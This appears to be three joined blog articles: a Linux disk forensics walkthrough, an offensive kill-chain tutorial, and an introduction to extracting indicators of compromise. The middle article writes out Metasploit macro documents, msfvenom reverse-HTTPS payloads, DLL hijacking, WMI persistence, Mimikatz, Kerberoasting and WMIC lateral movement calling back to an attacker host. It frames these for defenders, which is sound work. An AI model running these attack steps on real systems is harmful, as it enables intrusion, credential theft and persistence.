Intro to Linux Forensics

This article is a quick exercise and a small introduction to the world of Linux forensics. Below, I perform a series of steps to analyze a disk obtained from a compromised system running a Red Hat operating system. I start by identifying the file system, mounting the different partitions, and creating a super timeline and a file system timeline. I also take a quick look at the artifacts and then unmount the different partitions. The process of obtaining the disk is skipped, but here are some old but good notes on how to obtain a disk image from a VMware ESX host.

When obtaining the different disk files from the ESX host, you will need the VMDK files. Then you move them to your lab, which could be as simple as your laptop running a VM with the SIFT workstation. To analyze the VMDK files you could use the “libvmdk-utils” package, which contains tools to access data stored in VMDK files. However, another approach is to convert the VMDK file format into RAW format. This way, it will be easier to run the different tools – such as the tools from The Sleuth Kit, which will be heavily used – against the image. To perform the conversion, you could use the QEMU disk image utility. The picture below shows this step.
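As a minimal sketch – the file names here are hypothetical – the conversion looks something like this:

```
# convert a VMDK disk image to RAW so the TSK tools can work against it
qemu-img convert -f vmdk -O raw compromised.vmdk compromised.raw
```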

Following that, you could list the partition table from the disk image and obtain information about where each partition starts (in sectors) using the “mmls” utility. Then, use the starting sector to query the details associated with the file system using the “fsstat” utility. As you can see in the image, the “mmls” and “fsstat” utilities are able to identify the first partition, “/boot”, which is of type 0x83 (ext4). However, “fsstat” does not recognize the second partition, which starts at sector 1050624.
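Along these lines – the 2048 offset below is illustrative, use the starting sector reported by mmls:

```
# list the partition table (starting sectors) of the raw image
mmls compromised.raw
# query file system details at a given starting sector, e.g. the /boot partition
fsstat -o 2048 compromised.raw
```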

This is due to the fact that this partition is of type 0x8e (Logical Volume Manager). Nowadays, many Linux distributions use the LVM (Logical Volume Manager) scheme by default. LVM uses an abstraction layer that allows a hard drive, or a set of hard drives, to be allocated to a physical volume. The physical volumes are combined into volume groups, which in turn can be divided into logical volumes, which have mount points and a file system type such as ext4.

With the “dd” utility you can easily see that you are in the presence of LVM2 volumes. To make them usable for our different forensic tools we will need to create device maps from the LVM partition table. To perform this operation, we start with “kpartx”, which will automate the creation of the partition devices by creating loopback devices and mapping them. Then, we use the different utilities that manage LVM volumes, such as “pvs”, “vgscan” and “vgchange”. The figure below illustrates the necessary steps to perform this operation.
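A sketch of this sequence – the volume group name “VolGroup” is an assumption, yours will differ:

```
# map the partitions in the image to loopback devices
kpartx -a -v compromised.raw
# confirm the LVM physical volume is visible
pvs
# scan for volume groups and activate them
vgscan
vgchange -a y VolGroup
# the logical volumes should now appear under /dev/mapper/
ls /dev/mapper/
```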

After activating the LVM volume group, we have six devices that map to six mount points that make up the file system structure for this disk. The next step is to mount the different volumes read-only, as we would mount a normal device for forensic analysis. For this, it is important to create a folder structure that matches the partition scheme.
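For example – the device and mount point names below are assumptions, adjust them to your partition scheme:

```
mkdir -p /mnt/case/
# mount the root logical volume read-only, without updating access times
mount -o ro,noatime /dev/mapper/VolGroup-lv_root /mnt/case/
mkdir -p /mnt/case/boot
# mount the /boot partition from the mapping created by kpartx
mount -o ro,noatime /dev/mapper/loop0p1 /mnt/case/boot
```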

After mounting the disk, you normally start your forensic analysis and investigation by creating a timeline. This is a crucial and very useful step because it includes information about files that were modified, accessed, changed and created, in a human readable format, known as MAC time evidence (Modified, Accessed, Changed). This activity helps to establish when a particular event took place and in which order.

Before we create our timeline, it is noteworthy that on Linux file systems like ext2 and ext3 there is no timestamp for the creation/birth time of a file; there are only 3 timestamps. The creation timestamp was introduced with ext4. The book “Forensic Discovery” (1st Edition) by Dan Farmer and Wietse Venema outlines the different timestamps:

  • Last Modification time. For directories, the last time an entry was added, renamed or removed. For other file types, the last time the file was written to.
  • Last Access (read) time. For directories, the last time it was searched. For other file types, the last time the file was read.
  • Last Status Change. Examples of status changes are: change of owner, change of access permission, change of hard link count, or an explicit change of any of the MACtimes.
  • Deletion time. Ext2fs and Ext3fs record the time a file was deleted in the dtime stamp, but not all tools support it.
  • Creation time. Ext4fs records the time the file was created in the crtime stamp, but not all tools support it.

The different timestamps are stored in the metadata contained in the inodes. Inodes are the equivalent of the MFT entry number in the Windows world. One way to read file metadata on a Linux system is to first get the inode number using, for example, the command “ls -i file”, and then run “istat” against the partition device, specifying the inode number. This will show you the different metadata attributes, which include the timestamps, the file size, owner group and user IDs, permissions and the blocks that contain the actual data.
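As a quick illustration – the inode number and device name here are hypothetical:

```
# find the inode number of a file on the mounted image
ls -i /mnt/case/etc/passwd
# display the inode's metadata (timestamps, size, owner, data blocks)
istat /dev/mapper/VolGroup-lv_root 131075
```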

Ok, so, let’s start by creating a super timeline. We will use Plaso to create it. For context, Plaso is a Python-based rewrite of the Perl-based log2timeline, initially created by Kristinn Gudjonsson and enhanced by others. The creation of a super timeline is an easy process and it applies to different operating systems; however, the interpretation is hard. The latest version of the Plaso engine is able to parse ext4 and also parses different types of artifacts such as syslog messages, audit, utmp and others. To create the super timeline we will launch log2timeline against the mounted disk folder and use the Linux parsers. This process will take some time, and when it is finished you will have a timeline with the different artifacts in Plaso database format. Then you can convert it to CSV format using the “psort.py” utility. The figure below outlines the steps necessary to perform this operation.
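A minimal sketch of these two steps, assuming the disk is mounted under /mnt/case/:

```
# create the super timeline using the Linux parser preset
log2timeline.py --parsers linux plaso.dump /mnt/case/
# sort and convert the Plaso storage file to CSV for review
psort.py -o l2tcsv -w supertimeline.csv plaso.dump
```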

Before you start looking at the super timeline, which combines different artifacts, you can also create a traditional timeline for the ext file system layer, containing data about allocated and deleted files and unallocated inodes. This is done in two steps. First, you generate a body file using the “fls” tool from TSK. Then you use “mactime” to sort its contents and present the results in human readable format. You can perform this operation against each one of the device maps that were created with “kpartx”. For the sake of brevity, the image below only shows this step for the “/” partition. You will need to do it for each one of the other mapped devices.
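Something along these lines, per mapped device:

```
# generate a body file of allocated and deleted file entries
fls -r -m / /dev/mapper/VolGroup-lv_root > bodyfile
# sort the body file into a human readable, delimited timeline
mactime -b bodyfile -d > fs-timeline.csv
```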

Before we start the analysis, it is important to mention that on Linux systems there is a wide range of files and logs that might be relevant for an investigation. The amount of data available to collect and investigate may vary depending on the configured settings and also on the function/role performed by the system. Also, the different flavors of Linux operating systems follow a filesystem structure that arranges the different files and directories in a common standard. This is known as the Filesystem Hierarchy Standard (FHS) and is maintained here. It is beneficial to be familiar with this structure in order to spot anomalies. There is too much to cover in terms of things to look at, but one thing you might want to do is run the “chkrootkit” tool against the mounted disk. Chkrootkit is a collection of scripts created by Nelson Murilo and Klaus Steding-Jessen that allow you to check the disk for the presence of any known kernel-mode and user-mode rootkits. The latest version is 0.52 and contains an extensive list of known bad files.
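chkrootkit supports pointing at an alternate root directory, which fits our mounted evidence; as a sketch:

```
# check the mounted evidence for known rootkit remnants
./chkrootkit -r /mnt/case/
```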

Now, with the super timeline and the file system timeline produced, we can start the analysis.

During the analysis, it helps to be meticulous and patient, and it facilitates things if you have comprehensive knowledge of file system and operating system artifacts. One thing that helps the analysis of a (super) timeline is to have some kind of lead about when the event happened. In this case, we got a hint that something might have happened in the beginning of April. With this information, we start to reduce the time frame of the (super) timeline and narrow it down. Essentially, we will be looking for artifacts of interest that have temporal proximity with that date. The goal is to be able to recreate what happened based on the different artifacts.

After going back and forth with the timelines, we found some suspicious activity. The figure below illustrates the timeline output that was produced using “fls” and “mactime”. Someone deleted a folder named “/tmp/k” and renamed common binaries such as “ping” and “ls”, and files with the same names were placed in the “/usr/bin” folder.

This needs to be looked at further. Looking at the timeline, we can see that the output of “fls” shows that the entry has been deleted. Because the inode wasn’t reallocated, we can try to see if a backup of the file still resides in the journal. The journaling concept was introduced with the ext3 file system. On ext4, journaling is enabled by default and uses the mode “data=ordered”. You can see the different modes here. In this case, we could also check the options used to mount the file system. To do this, just look at “/etc/fstab”. In this case we could see that the defaults were used. This means we might have a chance of recovering data from deleted files, provided the gap between the time the directory was deleted and the time the image was obtained is short. File system journaling is a complex topic, but it is well explained in books like “File System Forensic Analysis” by Brian Carrier. This SANS GCFA paper from Gregorio Narváez also covers it well. One way you could attempt to recover deleted data is using the tool “extundelete”. The image below shows this step.
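A sketch of the recovery attempt – device and output paths assumed:

```
# attempt to recover the deleted directory using metadata still in the journal
extundelete /dev/mapper/VolGroup-lv_root --restore-directory tmp/k -o /cases/recovered/
```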

The recovered files would be very useful to understand more about what happened and to further help the investigation. We can compute the files’ MD5s, verify their contents, and check whether they are known to the NSRL database or VirusTotal. If it’s a binary, we can run strings against it and deduce functionality with tools like “objdump” and “readelf”. Moving on, we also obtain and look at the different files that were created in “/usr/sbin”, as seen in the timeline. Checking their MD5s, we found that they are legitimate operating system files distributed with Red Hat. However, the files in the “/bin” folder such as “ping” and “ls” are not, and they match the MD5s of the files recovered from “/tmp/k”. Because some of the files are ELF binaries, we copy them to an isolated system in order to perform a quick analysis. The topic of Linux ELF binary analysis will be for another time, but we can easily launch the binary using “ltrace -i” and “strace -i”, which will intercept and record the different function/system calls. Looking at the output, we can easily spot that something is wrong. This binary doesn’t look like the normal “ping” command. It calls the fopen() function to read the file “/usr/include/a.h” and writes to a file in the /tmp folder whose name is generated with tmpnam(). Finally, it generates a segmentation fault. The figure below shows this behavior.
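On the isolated analysis system, the triage could look like this – the file names are assumed:

```
# hash the suspicious binary so it can be checked against NSRL/VirusTotal
md5sum ping
# look for readable strings that hint at functionality
strings -a ping | less
# record library and system calls while running the sample (isolated VM only!)
ltrace -i ./ping 2>&1 | tee ltrace-ping.txt
strace -i -f ./ping 2>&1 | tee strace-ping.txt
```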

Provided with this information, we go back and see that this file “/usr/include/a.h” was modified moments before the file “ping” was moved/deleted. So, we can check when this “a.h” file was created – using the new crtime timestamp of the ext4 file system – with the “stat” command. By default, “stat” doesn’t show the crtime timestamp, but you can use it in conjunction with “debugfs” to get it. We also checked that the contents of this strange file are gibberish.
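One way to pull the crtime out of ext4 – the inode number and device are hypothetical:

```
# get the inode number of the file
stat -c %i /mnt/case/usr/include/a.h
# ask debugfs for the full inode details, which include crtime on ext4
debugfs -R 'stat <455>' /dev/mapper/VolGroup-lv_root
```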

So, now we know that someone created this “a.h” file on April 8, 2017 at 16:34, and we were able to recover several other files that were deleted. In addition, we found that some system binaries seem to be misplaced and at least the “ping” command expects to read something from this “a.h” file. With this information we go back and look at the super timeline in order to find other events that might have happened around this time. As I mentioned, the super timeline is able to parse different artifacts from the Linux operating system. In this case, after some cleanup, we could see that we have artifacts from audit.log and WTMP at the time of interest. The Linux audit.log tracks security-relevant information on Red Hat systems. Based on pre-configured rules, the audit daemon generates log entries to record as much information as possible about the events that are happening on your system. WTMP records information about the logins and logouts to the system.

The logs show that someone logged into the system from the IP 213.30.114.42 (fake IP) using root credentials, moments before the file “a.h” was created and the “ping” and “ls” binaries were misplaced.

And now we have a network indicator. The next step would be to start looking at our proxy and firewall logs for traces of that IP address. In parallel, we could continue our timeline analysis to find additional artifacts of interest, perform in-depth binary analysis of the files found, and create IOCs and, for example, Yara signatures, which will help find more compromised systems in the environment.

That’s it for today. After you finish the analysis and forensic work, you can unmount the partitions, deactivate the volume group and delete the device mappers. The picture below shows these steps.
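Roughly the reverse of the setup, with the same assumed names as before:

```
# unmount the evidence, deactivate the volume group and remove the mappings
umount /mnt/case/boot
umount /mnt/case/
vgchange -a n VolGroup
kpartx -d -v compromised.raw
```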

Linux forensics is a different and fascinating world compared with Microsoft Windows forensics. The interesting part (the investigation) is to get familiar with Linux system artifacts. Install a pristine Linux system, obtain the disk and look at the different artifacts. Then compromise the machine using some tool/exploit, obtain the disk and analyze it again. This allows you to get practice. Practice this kind of skill, share your experiences, get feedback, repeat the practice, and improve until you are satisfied with your performance. If you want to look further into this topic, you can read “The Law Enforcement and Forensic Examiner’s Introduction to Linux” written by Barry J. Grundy. It is not being updated anymore, but it is a good overview. In addition, Hal Pomeranz has several presentations here and a series of articles on the SANS blog, especially the 5 articles written about EXT4.


References:
Carrier, Brian (2005) File System Forensic Analysis
Nikkel, Bruce (2016) Practical Forensic Imaging


Offensive Tools and Techniques

In this article I go over a series of examples that illustrate different tools and techniques that are often used by both sides of the force! To exemplify them, I will follow the different attack stages and will use the intrusion kill chain as the methodology. This methodology consists of seven stages: reconnaissance, weaponization, delivery, exploitation, installation, C2 and actions on objectives.

Let’s start with recon! The goal here is to seek information about the target, normally a person. Targeting high-profile individuals might be difficult because these individuals tend to have a personalized security group that looks after them. However, using different intelligence-gathering techniques, such as searching information available in a variety of public information sources, you can target other personnel. Due to human nature, people succumb to social engineering techniques and often provide more information than is necessary. A starting point is to harvest metadata about the organization and personnel. Normally, companies do not know what metadata they are giving away. Metadata is a golden pot of information: usernames, software versions, printers, email addresses and other details can be retrieved using a tool such as the FOCA Metadata Analysis Tool. You can see the presentation about FOCA 2.5 that was given by Chema Alonso and Jose Palazon (Palako) in 2010 at Defcon 18. In the end, the attacker will use whatever works to gather as much information as possible about employee names, position in the hierarchy, friends and relatives, hobbies, etc.

Next step, weaponization and delivery! After gathering as much information as possible and performing enough recon, the attacker will choose the best method to perform the attack with the available resources. Nowadays, spear phishing with attached documents is very dominant and probably a good choice as the attack vector. The sophistication of how a document is weaponized and delivered might correlate with the amount of resources available to the attacker. In the example below I show how you could use Metasploit to easily create a Word document with a malicious macro that, when executed, will connect back to the attacker's system and establish a command and control channel. The payload uses HTTPS as the communication channel, but it uses a self-signed certificate and points to an IP address and not a domain. In organizations of different sizes, the web filtering controls are often tight and use different blocking techniques that might detect and stop this type of connection. However, the attacker can register a new domain or buy an expired domain ahead of time, create a simple and realistic web page, and categorize the domain in a category such as Finance or Healthcare – these are normally allowed in web filtering products, and the SSL probably wouldn’t be terminated and inspected. The attacker can also buy a cheap SSL certificate to make this scenario much more realistic. In addition, Metasploit just introduced an updated traffic obfuscation technique that will make it harder for security products to detect it.

Before I continue with the different tools and techniques, it is worth mentioning that in this article I give several examples using the Metasploit Framework. For those of you who don’t know, the Metasploit Framework was originally created by the legendary H.D. Moore back in 2003, originally coded in Perl and then ported to Ruby. In 2004, Metasploit Framework 2.0 was released and had fewer than 20 exploits and a similar number of payloads. Today, the free version of the Metasploit Framework has more than 1600 exploits and more than 400 payloads. In addition, many other auxiliary modules, encoders and post-exploitation modules are available. The modular framework of Metasploit makes it a fantastic tool to design, build and launch exploits.

So, the picture below illustrates how to use Metasploit to create a weaponized Word document. An alternative to this technique is to use PowerShell Empire; see this article from Matt Nelson.

offensive-macro
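In msfconsole, the gist of it would be something like the following – the module path is an assumption based on current Metasploit versions, and the IP is illustrative:

```
msf > use exploit/multi/fileformat/office_word_macro
msf > set PAYLOAD windows/meterpreter/reverse_https
msf > set LHOST 203.0.113.10
msf > set LPORT 443
msf > exploit
```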

Then, the Word document can be customized and tailored to the target. To summarize, the attacker crafts a phishing email, either with a weaponized document or a malicious link. This, coupled with different social engineering techniques that appeal to human nature and exploit human vulnerabilities, has a good probability of making the attack a success. There is another factor that might impact the success of the campaign, which is the ability of the malicious email/link to circumvent the multitude of expensive filters that are layered throughout the network boundary and reach the endpoint. If the email reaches the endpoint, you might have a well-intentioned employee making mistakes. If these conditions are met, the attacker will establish a foothold inside the corporate network.

The picture below depicts the steps performed by the attacker to launch the Metasploit handler that will accept the beacon from the malicious document. Then, it shows the communication received and the established session.

offensive-macrohandler
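On the attacker side, the handler would be started roughly like this:

```
msf > use exploit/multi/handler
msf > set PAYLOAD windows/meterpreter/reverse_https
msf > set LHOST 203.0.113.10
msf > set LPORT 443
msf > exploit -j
```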

Next step, exploitation! With a foothold in the environment and an established communication channel, the attacker will act quickly and stealthily and will probably try to find avenues to exploit other systems and achieve higher privileges. Ruben Boonen, who maintains fuzzysecurity.com and goes by the handle @FuzzySec, has written a very comprehensive article describing the different techniques that can be used to escalate privileges in a Windows environment. Another great resource is the paper “Windows Services – All roads lead to SYSTEM” by Kostas Lintovois, which exemplifies several ways in which misconfigured services could be compromised. These techniques are very useful for attackers because in many organizations normal users don’t have admin rights. Admin rights are likely a goal that all attackers aim for in an enterprise environment because they facilitate their job.

Many of the techniques written about by Ruben and others have been materialized in the post-exploitation framework known as PowerSploit, in a module called PowerUp.ps1, originally written by Will Schroeder – a brilliant security researcher who in recent years has released powerful tools. PowerSploit contains a great library of modules and scripts that help in all phases of an attack life-cycle. The PowerUp module facilitates the discovery of conditions that would allow an attacker to execute a technique that will lead him to a privileged account. All this is done using PowerShell and can be executed from within Meterpreter using the PowerShell extension that was written by OJ Reeves and incorporated into Metasploit. This means that the attacker can run PowerUp from within Metasploit. You can read more about PowerUp on Will Schroeder's blog and also get the PowerUp cheat sheet from here.

The picture below illustrates this scenario, where the attacker, after getting a foothold in the environment – via a phishing email – verifies that the account he is operating with doesn’t have enough privileges to run additional modules such as the powerful Mimikatz. Mimikatz is a post-exploitation tool written in C and developed by Benjamin Delpy. You can read more about many of its features in Sean Metcalf's Unofficial Guide to Mimikatz and Command Reference here and here. However, Meterpreter contains a PowerShell module that allows the attacker to execute PowerShell commands. In this case the attacker can load the PowerShell module, execute the necessary commands to download PowerUp from GitHub, a site owned by the attacker, or some other place, and then run Invoke-AllChecks. At the time of this writing, the PowerUp module contains 14 checks.

offensive-powerup
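From the Meterpreter session, this is roughly the sequence – the script path is assumed:

```
meterpreter > load powershell
meterpreter > powershell_import /opt/PowerSploit/Privesc/PowerUp.ps1
meterpreter > powershell_execute Invoke-AllChecks
```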

In this case, as you can see in the image, the conditions necessary to perform DLL hijacking are found by the PowerUp module. Essentially, the system contains a directory that any authenticated user can write to, and this directory is part of the %PATH% environment variable. With this, the attacker can leverage the DLL search order and obtain SYSTEM privileges. In this case PowerUp suggests using “wlbsctrl.dll”. For this to work, the Windows service “IKE and AuthIP IPsec Keying Modules” needs to be running, but in enterprises where workstations have VPN clients installed this is quite common. This vulnerability was discovered in 2012 by the High-Tech Bridge Security Research Lab. It leverages the Windows service “IKE and AuthIP IPsec Keying Modules”, which during startup tries to load the “wlbsctrl.dll” DLL that doesn’t exist on default Windows installations. A great explanation of how this technique works and why the vulnerability exists was written by Parvez Anwar here. Other resources on this topic are the “DLL Hijacking Like a Boss!” presentation by Jake Williams and an old article from the Corelan team here.

So, now that there is an avenue to explore, the next step is for the attacker to create a DLL that matches the architecture of the target system and has the name “wlbsctrl.dll”. This can be easily done with msfvenom. This utility is very popular for creating one-liner commands that generate and encode a desired payload. Msfvenom was added to Metasploit in 2011 and combines the older msfpayload and msfencode commands in one utility. This is shown in the figure below.

offensive-dll
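For instance – the LHOST value is illustrative:

```
msfvenom -p windows/meterpreter/reverse_https LHOST=203.0.113.10 LPORT=443 -f dll -o wlbsctrl.dll
```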

Another way to leverage this technique is to use the Write-HijackDll function available in the PowerUp.ps1 module. This function will create and drop the “wlbsctrl.dll” DLL into the writable path, and when the service starts, the DLL will be loaded and will add a user to the local administrators group with a predefined password.

An important remark regarding the usage of PowerShell is that in some environments security might be tight and PowerShell execution might be blocked. However, in these cases the attacker could use other techniques and tools such as PowerOPS: PowerShell for Offensive Operations, written by Portcullis Labs and inspired by the PowerShell Runspace Post Exploitation Toolkit written by Cn33liz.

After that, the attacker uploads the DLL to the desired folder and can then force a reboot or wait for the system to be rebooted. When the system starts, the IKEEXT service will be started and the malicious DLL will be loaded, spawning a command and control channel back to the system owned by the attacker, with SYSTEM privileges. The picture below illustrates the upload of the malicious DLL to the folder that has weak permissions and is part of the %PATH% variable. It then shows the command and control channel that is established when the IKEEXT service is started. With these high privileges, the attacker can then move on and start using the powerful Mimikatz module. To start, he can obtain clear text credentials by using the kerberos command.

offensive-dllhijack
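In Meterpreter terms, this could look like the following – the writable directory is hypothetical, and the kerberos command comes from the older Mimikatz extension:

```
meterpreter > upload wlbsctrl.dll "C:\\SomeApp\\bin"
meterpreter > reboot
...
meterpreter > load mimikatz
meterpreter > kerberos
```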

Now, the attacker is operating under a high privileged account! With that, the attacker can move on and find a way to establish a persistence mechanism and in parallel move laterally within the environment.

Next step, installation and C2! There is a multitude of clever techniques and tools used by attackers to establish a persistence mechanism, but in this case I will give an example of using WMI combined with PowerShell, using a payload crafted by Metasploit.

WMI has gained popularity among attackers in recent years. A good resource is the presentation that Matt Graeber gave at Black Hat 2015: Abusing Windows Management Instrumentation (WMI) to Build a Persistent, Asynchronous, and Fileless Backdoor. In addition, William Ballenthin, Matt Graeber and Claudiu Teodorescu have written a great paper about the usage of WMI for both offense and defense. Furthermore, you can read the paper WMI for Detection and Response from NCCIC/ICS-CERT.

So, to achieve persistence, the attacker could use Windows Management Instrumentation (WMI). WMI will be used as a vehicle to trigger a payload to run at a particular event. This event could be a specific schedule, an event that occurred at the OS level, such as a login, or one of the many other events supported by WMI. The payload leverages PowerShell to perform a technique known as Reflective DLL injection, which will call back to the attacker's system and inject the Metasploit Meterpreter – to read more about Reflective DLL injection, read this article from Dan Staples and its references. The communication occurs over HTTPS back to the domain owned by the attacker. In sum, the attacker will only use Windows built-in functionality combined with Metasploit. This arrangement of different tools and techniques leads to more powerful attacks that are harder to detect. In addition, this technique leverages an in-memory payload that doesn’t touch disk, due to the fact that it uses a PE loader in memory to load the DLL and not the traditional LoadLibraryA() method. The persistence mechanism lives inside the WMI repository, which is likely to be outside the radar of many defenders.

Let’s see how the attacker can build this. To craft the payload, the attacker could use the msfvenom utility that is part of the Metasploit framework. The following picture illustrates the use of msfvenom to create the Reflective DLL injection payload in PowerShell format.

offensive-pshcmd
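Along these lines:

```
msfvenom -p windows/meterpreter/reverse_https LHOST=203.0.113.10 LPORT=443 -f psh-cmd -o payload.txt
```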

The next step would be to weaponize this payload into a Managed Object Format (MOF) script.

offensive-wmimof

Next, the attacker will use the Managed Object Format (MOF) compiler, mofcomp.exe, on the target machine. This utility will parse a file containing MOF statements and add the classes and class instances defined in the file to the WMI repository. A good article about MOF is “Playing with MOF files on Windows, for fun & profit” from Jérémy Brun-Nouvion. After that, a series of wmic.exe commands can be executed to view the contents of the different classes.

offensive-wmicommands
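For example – the MOF file name is hypothetical:

```
C:\> mofcomp.exe evil.mof
C:\> wmic /namespace:\\root\subscription PATH __EventFilter GET /FORMAT:list
C:\> wmic /namespace:\\root\subscription PATH CommandLineEventConsumer GET /FORMAT:list
C:\> wmic /namespace:\\root\subscription PATH __FilterToConsumerBinding GET /FORMAT:list
```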

These commands are executed within the Meterpreter session that was established with the DLL hijacking technique. Then the attacker can cover his tracks, delete the malicious MOF script and move on. When the WMI event is triggered, the payload is invoked and a Meterpreter session is established back to the system owned by the attacker. With this, the attacker has a persistence mechanism and is operating in the target environment with a privileged account.

Next, actions on objectives! Lateral movement has traditionally been done using a variety of commands and tools such as net.exe, psexec.exe and wmic.exe. Nowadays, you can add PowerShell to the mix, more specifically using the PowerView tool, which was developed by Will Schroeder and is part of the PowerSploit tools and scripts. PowerView is an advanced Active Directory enumeration tool written in PowerShell that allows an attacker to gather an extensive amount of information about a Windows enterprise environment. You can read more about the reasoning behind PowerView here. This great write-up demonstrates several use cases for PowerView. Once again, we can load PowerView from within our Meterpreter session. In this case, the session has SYSTEM privileges and was obtained leveraging the WMI persistence, but PowerView can run under a normal account. The picture below exemplifies this step.

offensive-powerview
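For instance, reusing the Meterpreter PowerShell extension – the script path is assumed:

```
meterpreter > powershell_import /opt/PowerSploit/Recon/PowerView.ps1
meterpreter > powershell_execute Get-NetDomain
meterpreter > powershell_execute Get-NetDomainController
```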

The list of functions available within PowerView is here and the cheat sheet is here. The attacker starts enumerating different aspects of the Active Directory and the different systems just by leveraging PowerShell commands. To perform this, he can leverage different techniques and modules within PowerView. For a great summary you can see – once again – Will Schroeder's presentation given at Troopers 16, entitled “I have the power view”.

So, to start, the attacker can leverage the Kerberoasting technique. This technique, pioneered by Tim Medin – I recommend you watch his presentation “Attacking Kerberos – Kicking the Guard Dog of Hades” – is brilliant and exploits the way Kerberos functions inside a Microsoft environment. This technique has been adopted by PowerView, and running it is as simple as listing all user accounts in the Active Directory environment that have an SPN, requesting a Kerberos ticket for each, and extracting the crypto material, which is then cracked offline to obtain the clear text password. You can read more about it in these two articles written by Will, here and here. The picture below illustrates the Kerberoasting technique.

offensive-kerberoast

After obtaining the hash, you can use John the Ripper to crack the password, using krb5tgs as the hash format.
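A sketch of both steps – it assumes a PowerView version that includes Invoke-Kerberoast, and the file names are illustrative:

```
# from the Meterpreter PowerShell session: request SPN tickets and dump crackable hashes
meterpreter > powershell_execute "Invoke-Kerberoast -OutputFormat John | Select -Expand Hash"
# offline, crack the extracted tickets with John the Ripper's krb5tgs format
john --format=krb5tgs --wordlist=rockyou.txt kerberoast.hashes
```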

Another attack vector is to find accounts in the Active Directory that don’t require Kerberos preauthentication, i.e., accounts that have preauthentication disabled. This technique was pioneered by Geoff Janjua from Exumbra Operations, and you can read about the work he did in the article “Kerberos Party Tricks: Weaponizing Kerberos Protocol Flaws”. Essentially, the technique consists of listing all accounts that have this attribute set and requesting a Kerberos ticket for those accounts. This ticket contains crypto material that can be extracted and cracked offline. Once again, this technique was adopted by PowerView and you can read more about it here.

Finally, if these techniques don’t work, the attacker will likely move from system to system until he finds one where he can obtain administrative privileges, and move on until he finds a domain admin. This can be a daunting task in large environments, but once again Will Schroeder has coded the necessary steps into a series of PowerView modules that carry the Hunter moniker, such as Invoke-UserHunter, Invoke-StealthUserHunter and many others, which facilitate the search for high value targets. You can view his presentation “I hunt sysadmins” to understand more about what these modules do behind the scenes. Justin Warner, one of the founders of PowerShell Empire, wrote a great article explaining how these modules work and went further by explaining a technique he named derivative local admin. This technique was then automated by Andy Robbins in a proof-of-concept tool called PowerPath, which leverages algorithms used to find the shortest path between two points. Andy then worked with Rohan Vazarkar and Will Schroeder, and their work culminated in the release of a tool called BloodHound, released as an open source tool at DEF CON 24. Bottom line: using the different techniques and tools implemented by these brilliant folks, the threat actor is likely to succeed in obtaining a high privileged account.

Then, it is a matter of pivoting inside the enterprise environment using the obtained privileged accounts. For that, the attacker can leverage the netsh.exe port forwarding feature or the Meterpreter portfwd command to pivot between internal systems. This technique is commonly used by attackers who want to use an internal system as a pivot, allowing direct access to machines otherwise inaccessible from the attacking system. The commands in the picture below illustrate this, where after configuring port forwarding on the compromised system, the attacker uses wmic.exe to launch PowerShell on a remote system, which will connect back to the attacker's system and establish a Meterpreter session.

offensive-wmimove
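A rough sketch of this pivot – the IPs, ports, account and the encoded command are placeholders:

```
C:\> netsh interface portproxy add v4tov4 listenport=8443 listenaddress=0.0.0.0 connectport=443 connectaddress=203.0.113.10
C:\> wmic /node:10.1.1.20 /user:CORP\svcadmin process call create "powershell.exe -NoP -W Hidden -Enc <base64payload>"
```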

From this moment on, it's a cycle: enumerate weaknesses, exploit them, compromise the system, move further, repeat. This cycle goes on and on until the attacker meets his objectives. A great resource about the techniques that were shown, and many others, is this article written by Raphael Mudge, the author of Cobalt Strike.

That’s it. With this we covered different tools and techniques that are used in the different attack stages, used nowadays by security professionals as well as by cyber criminals and APT groups. After this, I would ask: how would you detect, prevent and respond to each one of the steps outlined in this attack scenario?

Feel free to share your ideas in the comments below. Thanks for reading!


Extract and use Indicators of Compromise from Security Reports

Every now and then a new security report is released, and with it comes a wealth of information about different threat actors, offering insight into the attackers' tactics, techniques and procedures. For example, in this article I wrote back in 2014, you have a short summary of some of the reports that were released publicly throughout that year. These reports allow the security companies to advertise their capabilities, but on the other hand they are a great resource for network defenders. Some reports are more structured than others and they might contain different technical data. Nonetheless, almost all of them contain IOCs (Indicators of Compromise).

For those who have never heard about indicators of compromise, let me give a brief summary. IOCs are pieces of information that can be used to search for and identify compromised systems. These pieces of information have been around for ages, but the security industry is now using them in a more structured and consistent fashion. All types of enterprises are moving from the traditional way of handling security incidents – wait for an alert to come in and then respond to it – to a more proactive approach, which consists of taking the necessary steps to hunt for evil in order to defend their networks. In this new strategy, the IOCs are a key technical component. When someone compromises a system, they leave evidence behind. That evidence, artifact or remnant piece of information left by an attacker can be used to identify the intrusion, threat group or malicious actor. Examples of IOCs are IP addresses, domain names, URLs, email addresses, file hashes, HTTP user agents, registry keys, a service configuration change, a deleted file, etc. With this information one can sweep the network/endpoints and look for indicators that a system might have been compromised. For more background you can read Lenny Zeltser's summary. Will Gragido from RSA explained it well in his 3-part blog here, here and here. Mandiant also has this and this great article about it.

So, if almost all the published reports contain IOCs, is there a central place that collects all the reports released by the different security organizations? Kiran Bandla created a repository on GitHub named APTnotes where he does exactly that. He maintains a list of all security reports released by the different vendors: “APTnotes is a repository of publicly-available papers and blogs (sorted by year) related to malicious campaigns/activity/software that have been associated with vendor-defined APT (Advanced Persistent Threat) groups and/or tool-sets.” Kiran, among other methods, relies on the community, who share with him when a report was released, and he adds it to the APTnotes repository. The list of reports is available in CSV and JSON format.

So, what can you do with all these reports? How can we as network defenders use this information?

Three example use cases. The first use case is the most likely and common; the other two might be more common in larger organizations with a higher budget and bigger security appetite.

  • An organization that has a Security Operations Center in place could use the IOC’s to augment their existing monitoring and detection capabilities.
  • An organization that has in-house CSIRT capabilities could leverage the IOC’s in a proactive manner in order to have a higher probability of discovering something bad and, as such, reduce the business impact that a security incident might have in the organization.
  • An organization that has a Cyber Threat Intelligence capability in-house, could collect, process, exploit and analyze these reports. Then disseminate actionable information to the threat intelligence consumers throughout the organization.

In a simple manner, the process for the first scenario would look something like the following diagram:

ioc-loop

How would this work in practical terms? Normally, you can split the IOCs into host-based and network-based. For example, a DNS name or IP address will be more effective to search across your network infrastructure, whereas a registry key or an MD5 will more likely be searched across the endpoints.

For this article, I will focus on MD5s. Some reports offer file hashes using SHA-1 or SHA-256, but not many organizations have the capability to search for those; MD5 is more common. Noteworthy is that the value of MD5 hashes of a malicious file might be considered low. A great article about the value of IOCs and TTPs was written back in 2014 by David Bianco, titled The Pyramid of Pain. Following that, there is an article from Harlan Carvey with additional thoughts about it. Another point to take into consideration about the MD5s from the reports is that some might belong to legitimate files, due to the usage of DLL hijacking, or be Windows built-in commands used by threat actors. In addition, it is likely that malware used by the different threat actors is only used once, and you might not see an MD5 hash a second time. Nonetheless, the MD5s are a starting point.

So, how can we collect the reports, extract the IOC’s and convert them and use them?

